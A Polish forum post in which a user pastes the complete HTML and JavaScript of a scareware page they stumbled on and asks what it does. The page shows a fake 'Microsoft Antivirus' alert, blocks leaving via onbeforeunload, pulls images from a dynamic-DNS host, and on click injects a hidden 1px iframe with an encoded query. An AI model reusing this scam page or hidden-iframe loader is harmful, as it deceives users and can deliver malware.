Przeglądając sieć (konkretnie chyba ask.fm od losowej osoby) natrafiłem na dziwną stronę (nie wiem gdzie kliknąłem naprawdę). Strona ta wykonywała taki kod:
<html>
<head>
<script>
var truster=Math.random();
window.moveTo(truster-2*truster+truster,truster-2*truster+truster);
window.resizeTo(screen.width,screen.height);
var jackString="Microsoft_jackVorobey|Antivirus_jackVorobey|has_jackVorobey|found_jackVorobey|critical_jackVorobey|process_jackVorobey|activity_jackVorobey|on_jackVorobey|your_jackVorobey|PC";
var kuchko="\nYou_jackVorobey|need_jackVorobey|to_jackVorobey|clean_jackVorobey|your_jackVorobey|computer_jackVorobey|to_jackVorobey|prevent_jackVorobey|the_jackVorobey|system_jackVorobey|breakage.";
var eroskopli=1;
</script>
<title>Alert</title>
</head>
<body topmargin=0 leftmargin=0 bgcolor='#FFFFFF'>
<table cellspacing="0" cellpadding="0" border="0" width="100%" height="99%">
<tr valign="middle" align="center"><td>
<img id="al" src="http://ibypcfv.myvnc.com/images/lee/message.png" width="617" height="345" border="0" usemap="#maper">
<map name="maper">
<area shape="rect" coords="544,12,593,33" onmousedown='kloustrafobia();'>
<area shape="rect" coords="480,287,578,308" onclick="kolokolchik();" style='cursor:pointer' onmousedown='eroskopli=0;'>
</map>
</td>
</tr>
</table>
<div id="contentInner"></div>
</body>
<script>
result=jackString.replace(/_jackVorobey\|/g, ' ')+kuchko.replace(/_jackVorobey\|/g, ' ');
function kakashka(){
return eroskopli==1?result:false;
}
window.onbeforeunload=kakashka;
function kloustrafobia(){
alert(result);
}
kloustrafobia();
function kolokolchik(){
var ds = "IFR";
ds+="AME";
var aafd = document.createElement(ds);
aafd.src = "?c=RaEQL35Qhmg6kIcNyKqYS3/qzajgEyyBice/1X4aIdrWhbwB2GiTinHO11IRhFwRpScKkbUaOZz21LRlB1+g96CRictdheP8Lfq+X/WG9sHu";
aafd.style.width = "1px";
aafd.style.height = "1px";
aafd.style.border = "1px";
document.getElementById('contentInner').appendChild(aafd)
}
/*window.setTimeout(function(){
kolokolchik();
}, 4000);*/
</script>
</html>
Jest to mniej więcej dla mnie zrozumiałe jednak nie bardzo rozumiem sens działania funkcji "kolokolchik". Co ona właściwie robi? Wygląda na to, że jest wywoływana podczas zjechania myszką w duł (no ale kurde gdzie?!) i tworzy ramkę (domyślnie 0px border był ale zmieniłem).
Co pod tym linkiem "?c" może się znajdować?
Jak w ogóle udało mi się trafić na taką stronę? To wygląda na hm.. lokalny serwer z zewnętrznym IP ustawionym przez stronę no-ip.org
Czy jakiś kod javascript czy inny webowy what ever mógł zainfekować komputer?